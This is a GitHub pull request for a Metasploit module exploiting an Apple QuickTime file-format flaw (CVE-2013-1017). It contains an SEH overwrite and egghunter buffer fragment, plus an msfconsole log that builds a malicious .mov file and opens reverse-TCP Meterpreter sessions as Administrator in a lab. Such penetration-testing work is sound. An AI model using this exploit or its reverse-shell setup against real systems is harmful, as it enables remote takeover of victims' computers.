
CVE-2013-1017 Apple Quicktime File Format Exploit #2138

Merged
merged 2 commits into from Jul 21, 2013

Conversation

wchen-r7
Contributor

Pretty much like windows/browser/apple_quicktime_rdrf.rb, except this module is a file format one.

buf << sort_bytes("\xeb\x06#{rand_text_alpha(2)}") # nSEH
buf << sort_bytes([target.ret].pack("V*")) # SE Handler
buf << sort_bytes("\xe9\x95\xfd\xff\xff\xff") # Jmp to egghunter
buf << rand_text_alpha(50) # After SEH, only ~33 bytes
Contributor


Just asking whether egghunting is needed because there isn't space on the stack after SEH, or whether it's due to the file template size?

If it's due to the file template size, then maybe by just changing the sizes in the mov file used to exploit, a longer payload could be put after the SEH and egghunting could be avoided.

Contributor Author


Not enough space after SEH.

Contributor


Awesome! Processing!

@jvazquez-r7
Contributor

Working with both double click and "File / open" methods. Landing!

msf > use exploit/windows/fileformat/apple_quicktime_rdrf 
msf exploit(apple_quicktime_rdrf) > show options

Module options (exploit/windows/fileformat/apple_quicktime_rdrf):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.mov          yes       The file name.


Exploit target:

   Id  Name
   --  ----
   0   Quicktime 7.7.0 - 7.7.3 on Windows XP SP3


msf exploit(apple_quicktime_rdrf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(apple_quicktime_rdrf) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(apple_quicktime_rdrf) > rexploit
[*] Reloading module...

[*] Creating msf.mov
[+] msf.mov stored at /Users/juan/.msf4/local/msf.mov
msf exploit(apple_quicktime_rdrf) > use exploit/multi/handler 
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 192.168.172.244
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.244:1036) at 2013-07-21 10:55:40 -0500

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 192.168.172.244
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.244:1040) at 2013-07-21 10:56:17 -0500

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.244 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(handler) > 

jvazquez-r7 pushed a commit that referenced this pull request Jul 21, 2013
@jvazquez-r7 jvazquez-r7 merged commit e7e712f into rapid7:master Jul 21, 2013